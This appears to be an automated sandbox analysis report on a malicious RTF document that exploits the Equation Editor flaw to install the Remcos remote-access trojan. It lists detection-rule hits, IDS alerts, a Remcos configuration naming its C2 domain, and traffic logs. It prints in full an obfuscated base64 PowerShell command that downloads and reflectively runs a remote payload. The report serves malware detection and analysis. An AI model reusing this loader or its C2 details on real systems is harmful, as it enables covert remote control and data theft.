Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3352, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , ProcessId: 3520, ProcessName: wscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3352, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , ProcessId: 3520, ProcessName: wscript.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3792, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf", ProcessId: 3964, ProcessName: RegAsm.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3352, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS" , ProcessId: 3520, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3352, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3268, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3568, TargetFilename: C:\Users\user\AppData\Local\Temp\mqun3wpm.4oj.ps1

                  Stealing of Sensitive Information

                  Source: Registry Key setAuthor: Joe Security: Data: Details: D6 56 DB 60 DE 12 D0 73 A9 44 4F CE 38 DA 70 92 05 4E CA F2 B5 0E 2B 7B D1 C5 5A B6 C6 1D 18 9C D7 C1 65 32 3A B8 3D E0 01 00 F0 AE 38 3E B9 B5 61 76 C5 36 79 0F 82 78 62 C3 9D 80 D9 E5 E1 4C E4 83 92 9E 70 71 D9 44 BD 76 87 C8 3F D7 8B 5E 3E 7B 2A 06 7A F2 2E AD 0E 91 1C 25 2E 4A 71 F0 27 3B 03 E7 79 5A 56 A5 A3 B7 19 0F FC 92 E3 D6 3E F0 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3792, TargetObject: HKEY_CURRENT_USER\Software\Rmc-7B1J99\exepath
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-09-26T10:33:12.763912+0200 | 2020423 | 1 | Exploit Kit Activity Detected | 185.29.10.52 | 80 | 192.168.2.22 | 49163 | TCP
                  2024-09-26T10:33:12.763912+0200 | 2020425 | 1 | Exploit Kit Activity Detected | 185.29.10.52 | 80 | 192.168.2.22 | 49163 | TCP
                  2024-09-26T10:33:16.344510+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49164 | 192.210.150.29 | 14645 | TCP
                  2024-09-26T10:33:18.064584+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49165 | 192.210.150.29 | 14645 | TCP
                  2024-09-26T10:35:10.442136+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49167 | 192.210.150.29 | 14645 | TCP
                  2024-09-26T10:35:10.536458+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49168 | 192.210.150.29 | 14645 | TCP
                  2024-09-26T10:35:15.745754+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49169 | 192.210.150.29 | 14645 | TCP
                  2024-09-26T10:33:18.153483+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.22 | 49166 | 178.237.33.50 | 80 | TCP

                  AV Detection

                  Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | Avira URL Cloud: Label: malware
                  Source: authurremc.duckdns.org | Avira URL Cloud: Label: malware
                  Source: 00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "authurremc.duckdns.org:14645:1", "Assigned name": "authur", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7B1J99", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | ReversingLabs: Detection: 39%
                  Source: Yara match | File source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_004338C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00404423 FreeLibrary,CryptUnprotectData,13_2_00404423
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_f3ff602d-e

                  Exploits

                  Source: Yara match | File source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 185.29.10.52 Port: 80
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                  Privilege Escalation

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00407538 _wcslen,CoGetObject,9_2_00407538
                  Source: unknown | HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: Binary string: System.Data.Linq.pdb | source: powershell.exe, 00000008.00000002.385255527.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.383266190.0000000004289000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00407877 FindFirstFileW,FindNextFileW,9_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0044E8F9 FindFirstFileExA,9_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_10006580 FindFirstFileExA,9_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                  Software Vulnerabilities

                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: global traffic | DNS query: name: ia600100.us.archive.org
                  Source: global traffic | DNS query: name: authurremc.duckdns.org
                  Source: global traffic | DNS query: name: geoplugin.net
                  Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 185.29.10.52:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
